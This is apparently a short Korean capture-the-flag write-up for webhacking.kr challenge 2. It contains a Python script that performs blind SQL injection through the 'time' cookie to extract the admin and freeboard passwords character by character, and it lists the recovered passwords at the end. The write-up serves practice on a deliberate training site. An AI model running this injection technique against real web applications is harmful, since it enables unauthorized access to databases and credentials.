[webhacking.kr]2번-blindsql

table명은 게싱

freeboard와 admin의 password를 blindsqlinjection하고 board에서 주는 zip파일을 adminpage에서 admin 비번을 넣고 받은 비번으로 압축해제하면 key를 얻는다. 

#webhacking.kr 2번 

import http.client
import urllib
import string
def inj(q):
	con=http.client.HTTPConnection('webhacking.kr')
	head={'Host':'webhacking.kr'}
	head['Upgrade-Insecure-Requests']=1
	head['Cookie']='id=aaa; PHPSESSID=ddddd; time=1487488213 and '+q
	con.request('GET','/challenge/web/web-02/',headers=head)
	r=con.getresponse().read()
	#print(r)
	return b'09:00:01' in r

#print(inj('(select length(password) from admin)=10;'))
arr=list(string.ascii_letters+'1234567890')
print(arr)
adminpw=''
table='admin' #FreeB0aRd
for i in range(5,6):
	for a in range(95,100):
		q='(select ascii(substring(password,'+str(i)+',1)) from admin)='+str(a)+';'
		print(q)
		t=inj(q)
		print(chr(a))
		print(t)
		if t:
			adminpw+=a
			print(adminpw)
			break
	
for i in range(5,11):
	for j, a in enumerate(arr):
		q='(select ascii(substring(password,'+str(i)+',1)) from '+table+')='+str(ord(a))+';'
		print(q)
		t=inj(q)
		print(a)
		if t:
			adminpw+=a
			print(adminpw)
			break


print(adminpw)
adminpw='0nly_admin'
freeboardpw='7598522ae'